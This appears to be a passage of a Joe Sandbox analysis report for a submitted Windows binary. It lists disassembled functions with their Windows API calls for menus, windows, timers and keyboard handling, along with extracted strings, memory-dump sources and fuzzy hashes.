                                                                  • String ID:
                                                                  • API String ID: 3482734790-0
                                                                  • Opcode ID: 08497c751eff391bf64a908ae71c308ee7048294bcf8dda222aeb0ace4a929f8
                                                                  • Instruction ID: 4ce80cf29560d9f7e66c9494bc2dc274cbf713f645d87514fa55f61946c80c93
                                                                  • Opcode Fuzzy Hash: 08497c751eff391bf64a908ae71c308ee7048294bcf8dda222aeb0ace4a929f8
                                                                  • Instruction Fuzzy Hash: 32716B31610A46EFCB21DF24C9C9AEEBBF5FF58300F20486AE45A96151DBB0A9D1DB50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001CA6EE
                                                                  • GetMenuItemCount.USER32(?), ref: 001CA720
                                                                  • GetSubMenu.USER32(?,?), ref: 001CA764
                                                                  • GetMenuState.USER32(?,?,00000400), ref: 001CA77D
                                                                  • GetSubMenu.USER32(?,?), ref: 001CA7EC
                                                                  • GetMenuStringW.USER32(?,?,?,00000100,00000400), ref: 001CA811
                                                                  • _wcslen.LIBCMT ref: 001CA868
                                                                  • AppendMenuW.USER32(00000000,00000010,00000000,?), ref: 001CA896
                                                                  • GetMenuItemCount.USER32(00000000), ref: 001CA8D5
                                                                  • GetMenuItemID.USER32(?,?), ref: 001CA90E
                                                                  • InsertMenuW.USER32(?,?,00000000,00000000), ref: 001CA924
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString_wcslen
                                                                  • String ID:
                                                                  • API String ID: 881407318-0
                                                                  • Opcode ID: a75b22a470ede50cbb47eb93aefdd146d44cf5b265241fdca1217e6c95b02725
                                                                  • Instruction ID: 978c47a0d126e30de2a3f1ce0a7100f5e28317dd124f3ed9b58167f17d474490
                                                                  • Opcode Fuzzy Hash: a75b22a470ede50cbb47eb93aefdd146d44cf5b265241fdca1217e6c95b02725
                                                                  • Instruction Fuzzy Hash: C471DE7584122DAFCB219F94DC8CBE9BBB5FF28314F5041E9E509A6261CB309E90CF51
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00217CF6
                                                                  • GetWindow.USER32(?,00000005), ref: 00217D5A
                                                                    • Part of subcall function 002173E0: __EH_prolog3.LIBCMT ref: 002173E7
                                                                    • Part of subcall function 002173E0: GetWindow.USER32(?,00000005), ref: 00217407
                                                                    • Part of subcall function 002173E0: GetWindow.USER32(?,00000002), ref: 0021743D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$H_prolog3
                                                                  • String ID: 83/$2
                                                                  • API String ID: 1351209170-1965019549
                                                                  • Opcode ID: 480828af89569d4ac0fdbce356f013cfbe9a98f63d463d27e9bef1edcdc76374
                                                                  • Instruction ID: 9ac66d558443ace21faad0f6b25e55bdcd517cf5a5fb6deed8330f0b251bc66c
                                                                  • Opcode Fuzzy Hash: 480828af89569d4ac0fdbce356f013cfbe9a98f63d463d27e9bef1edcdc76374
                                                                  • Instruction Fuzzy Hash: A1D14730A1020A9FDF14EFA4C899BEEB7F5BF68300F140569F506AB292DF749991CB51
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001EB30C
                                                                  • SetCursor.USER32(00000040,001EBA9B,00000000,00000000,?), ref: 001EB3A6
                                                                    • Part of subcall function 001D03A2: __EH_prolog3.LIBCMT ref: 001D03A9
                                                                    • Part of subcall function 001D03A2: GetDC.USER32(00000000), ref: 001D03D5
                                                                    • Part of subcall function 002034C2: __EH_prolog3_GS.LIBCMT ref: 002034C9
                                                                    • Part of subcall function 002034C2: CreateRectRgnIndirect.GDI32(?), ref: 00203506
                                                                    • Part of subcall function 002034C2: CopyRect.USER32(?,?), ref: 0020351C
                                                                    • Part of subcall function 002034C2: InflateRect.USER32(?,?,?), ref: 00203532
                                                                    • Part of subcall function 002034C2: IntersectRect.USER32(?,?,?), ref: 00203540
                                                                    • Part of subcall function 002034C2: CreateRectRgnIndirect.GDI32(?), ref: 0020354A
                                                                    • Part of subcall function 002034C2: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0020355F
                                                                    • Part of subcall function 002034C2: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 002035C7
                                                                    • Part of subcall function 001D03F6: __EH_prolog3.LIBCMT ref: 001D03FD
                                                                    • Part of subcall function 001D03F6: ReleaseDC.USER32(?,00000000), ref: 001D041A
                                                                  • GetFocus.USER32 ref: 001EB445
                                                                  • SetTimer.USER32(?,00000014,000001F4,00000000), ref: 001EB505
                                                                  • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 001EB5AA
                                                                  • KillTimer.USER32(?,00000014), ref: 001EB6D6
                                                                  • SetTimer.USER32(?,00000014,000001F4,00000000), ref: 001EB6F3
                                                                  • UpdateWindow.USER32(?), ref: 001EB712
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Create$Timer$H_prolog3H_prolog3_Indirect$CopyCursorFocusInflateIntersectKillMessageReleaseSendUpdateWindow
                                                                  • String ID: <L/
                                                                  • API String ID: 2399994607-623769782
                                                                  • Opcode ID: fa016b2c1a7ffb00b71a4f7b071fb2871fc6b9df0a28e0540bebd853eec60144
                                                                  • Instruction ID: ec39ecea389e3a686d66a5375240cd26eb7f83eca68795fe083f0d0e29ce53b3
                                                                  • Opcode Fuzzy Hash: fa016b2c1a7ffb00b71a4f7b071fb2871fc6b9df0a28e0540bebd853eec60144
                                                                  • Instruction Fuzzy Hash: 80C15E70608A44DFDF259F65C8C5BAE77A5AF48324F284279FC1A9E2D6DB709840CB60
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00274FD9
                                                                  • _wcslen.LIBCMT ref: 00275005
                                                                  • _memset.LIBCMT ref: 00275016
                                                                  • GetKeyboardLayout.USER32(00000000), ref: 0027501F
                                                                  • MapVirtualKeyExW.USER32(00000000,00000000,00000000), ref: 00275028
                                                                  • GetKeyNameTextW.USER32(00000000,?,00000032), ref: 0027504F
                                                                  • _wcslen.LIBCMT ref: 00275059
                                                                  • IsCharLowerW.USER32(00000000,?,00000000), ref: 0027508B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CharH_prolog3_KeyboardLayoutLowerNameTextVirtual_memset
                                                                  • String ID: Pause
                                                                  • API String ID: 192923521-375111145
                                                                  • Opcode ID: eba464bd3b933dedadab3771fde096073f32dc26ba572f58e9b2417d8c0d782f
                                                                  • Instruction ID: a9601618ab29d05a8ec22b522a5eadbb92223f8bf61334f3b23d9661d076e476
                                                                  • Opcode Fuzzy Hash: eba464bd3b933dedadab3771fde096073f32dc26ba572f58e9b2417d8c0d782f
                                                                  • Instruction Fuzzy Hash: A2411A31A106249ADB31AB64DC85FEEF7A8AF54700F10841DF559A7192CFF09C60DBA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
                                                                  • String ID: 2
                                                                  • API String ID: 3509494761-3001879987
                                                                  • Opcode ID: 26388d2a31a8f6bde8c27f8fcd9168683e3690b6e52e190e90b0e73dea9b8314
                                                                  • Instruction ID: a26ba8e44f047ed2fb98f590783a4f2f73a9c0c10c6199de167872bb54e822ae
                                                                  • Opcode Fuzzy Hash: 26388d2a31a8f6bde8c27f8fcd9168683e3690b6e52e190e90b0e73dea9b8314
                                                                  • Instruction Fuzzy Hash: C7518C713102469FDF129F64C899BAA37B5AF05305F4804B9FA0A9F1A6DB70D814CB61
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$swprintf$H_prolog3_LongWindow_memcpy_s
                                                                  • String ID: - $:%d
                                                                  • API String ID: 3834591121-2359489159
                                                                  • Opcode ID: 90bea37e966b6161c068e9bf7b2c7a48d048922f804821b3101018548b8f6fff
                                                                  • Instruction ID: 7ced1d7ac282b15be6dd9073b4c9c3ecb4bf1fa226a97bec365f6dcc2a70c0f8
                                                                  • Opcode Fuzzy Hash: 90bea37e966b6161c068e9bf7b2c7a48d048922f804821b3101018548b8f6fff
                                                                  • Instruction Fuzzy Hash: C23188729206056BDB05EBE0CD96EEFB36DAF20300F444429B506AB157DF74EE648B90
                                                                  APIs
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C8599
                                                                    • Part of subcall function 002BF7E9: RaiseException.KERNEL32(001CA2E2,?,00000000,?,001CA2E2,?,?,001C106C,00000000), ref: 002BF82B
                                                                  • std::exception::exception.LIBCMT ref: 001C85C0
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C85DF
                                                                  • std::exception::exception.LIBCMT ref: 001C8601
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C8620
                                                                  • std::exception::exception.LIBCMT ref: 001C863D
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C865C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                                                  • String ID: d!1$|*1
                                                                  • API String ID: 4237746311-4264203618
                                                                  • Opcode ID: c428295662a608dd8f3cef86ddaba78cde4a9f21220dc2185409e48a40a2dafd
                                                                  • Instruction ID: 3c7eda3f3a78ecfd223868dcb525ecff6af0259233ee44fc32dc91f01238b29d
                                                                  • Opcode Fuzzy Hash: c428295662a608dd8f3cef86ddaba78cde4a9f21220dc2185409e48a40a2dafd
                                                                  • Instruction Fuzzy Hash: 2A217FB24143415FC315EF59D402ADFB7E8BFD8744F14895EF59856241EFB085188F62
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002A6D9F
                                                                    • Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
                                                                    • Part of subcall function 001D61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
                                                                    • Part of subcall function 001D61F6: LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
                                                                    • Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollInset,0000000B), ref: 002A6DEF
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollDelay,00000032), ref: 002A6DFE
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollInterval,00000032), ref: 002A6E0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
                                                                  • String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$Dz0$windows
                                                                  • API String ID: 4229786687-1486194555
                                                                  • Opcode ID: 6298c58cc1c7d0068dfdd82018bb93f6455845066eb6b76e72ed306b80278f2b
                                                                  • Instruction ID: e17f30140be18cd5a2490f3da003e40e88fc3843c3ea7348b48fd2948b1c52e7
                                                                  • Opcode Fuzzy Hash: 6298c58cc1c7d0068dfdd82018bb93f6455845066eb6b76e72ed306b80278f2b
                                                                  • Instruction Fuzzy Hash: E701A7B0A91740AFD726EF658D42B8AB6E8BFA4700F40051AF2486B3E1CBF45504CB04
                                                                  APIs
                                                                  • IsWindowVisible.USER32(00000000), ref: 00212E61
                                                                  • IsWindowVisible.USER32(00000000), ref: 00212E70
                                                                  • GetSystemMetrics.USER32(00000021), ref: 00212EA2
                                                                  • GetSystemMetrics.USER32(00000021), ref: 00212EA9
                                                                  • GetSystemMetrics.USER32(00000020), ref: 00212EAF
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • IsWindowVisible.USER32(00000000), ref: 00212ED7
                                                                  • IsWindowVisible.USER32(00000000), ref: 00212EE6
                                                                  • IsZoomed.USER32(00000000), ref: 00212F0C
                                                                  • GetSystemMetrics.USER32 ref: 00212F28
                                                                  • GetSystemMetrics.USER32(00000004), ref: 00212F6B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$VisibleWindow$Exception@8H_prolog3ThrowZoomed
                                                                  • String ID:
                                                                  • API String ID: 1383962431-0
                                                                  • Opcode ID: 00c177004811b04c2616894e6248c5e26640045669964e54e895307cdc7fa95a
                                                                  • Instruction ID: 5a0cad6fbb69005a13bbd5ac441abcec53920050f8d0d1cf317d8b400dae2213
                                                                  • Opcode Fuzzy Hash: 00c177004811b04c2616894e6248c5e26640045669964e54e895307cdc7fa95a
                                                                  • Instruction Fuzzy Hash: DA416831220242DFDB219F25C988BE677F4FF24354F044069F9998B2A1EB70ECA5CB51
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,00000000,?), ref: 00209E8E
                                                                  • GetWindowRect.USER32(?,?), ref: 00209EB1
                                                                  • SetRect.USER32(?,?,00000000,?,?), ref: 00209EF1
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00209F00
                                                                  • SetRect.USER32(?,?,00000000,?,?), ref: 00209F17
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00209F26
                                                                  • SetRect.USER32(?,00000000,?,?,?), ref: 00209F57
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00209F62
                                                                  • SetRect.USER32(?,00000000,?,00000001,?), ref: 00209F79
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00209F84
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Invalidate$Window$Proc
                                                                  • String ID:
                                                                  • API String ID: 570070710-0
                                                                  • Opcode ID: c8b42532eaa217bec46a7aef66e00652afcda3a5c6d8c3e0d4d237951bbda3e4
                                                                  • Instruction ID: 66158d1fac37cfaa8d950ba20429fe4c8b8b9868441c76c6ff02c0eede581aeb
                                                                  • Opcode Fuzzy Hash: c8b42532eaa217bec46a7aef66e00652afcda3a5c6d8c3e0d4d237951bbda3e4
                                                                  • Instruction Fuzzy Hash: E1410CB691021AAFDB04CFA4DE89EAFBBBCFB08700F104115FA45A7551D770AA50CFA1
                                                                  APIs
                                                                  • GetCapture.USER32 ref: 0021C695
                                                                  • WindowFromPoint.USER32(?,?,?,00000001,?,00000000), ref: 0021C6A4
                                                                  • GetActiveWindow.USER32 ref: 0021C6C6
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0021C6DE
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0021C6ED
                                                                  • GetDesktopWindow.USER32 ref: 0021C6F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
                                                                  • String ID:
                                                                  • API String ID: 1298419125-0
                                                                  • Opcode ID: 409b2f466325c48ca087048a8036afdc7108ede806c8e81d7b4294968a41440d
                                                                  • Instruction ID: 41efd06cb3635324ad4d09a22a2fe77bc597450b181624c0dc7c8fe4d1008835
                                                                  • Opcode Fuzzy Hash: 409b2f466325c48ca087048a8036afdc7108ede806c8e81d7b4294968a41440d
                                                                  • Instruction Fuzzy Hash: DE317079990216DFCB21AFA4D9888EDBBF9BB64300B314465E445AB290DFB08D92CF51
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 001EA5D3
                                                                  • GetClientRect.USER32(?,?), ref: 001EA5E6
                                                                  • GetWindowRect.USER32(?,?), ref: 001EA634
                                                                  • GetParent.USER32(?), ref: 001EA63D
                                                                  • GetParent.USER32(?), ref: 001EA85A
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 001EA87E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$RectWindow$ClientRedraw
                                                                  • String ID: 0\/$83/
                                                                  • API String ID: 443302174-1463869021
                                                                  • Opcode ID: 8d84d94827642b486edc547eee002bd814c4704fd48f9cbb14d1ac74a2cd36a4
                                                                  • Instruction ID: f28e2e8809067304137f0a94820040224eff91ff5c0cc8fb99f388766db5b118
                                                                  • Opcode Fuzzy Hash: 8d84d94827642b486edc547eee002bd814c4704fd48f9cbb14d1ac74a2cd36a4
                                                                  • Instruction Fuzzy Hash: 57B16B35E006589FCF15DFA9C888AEEBBB5FF48701F5541A9E406AB255CB30A940CF62
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
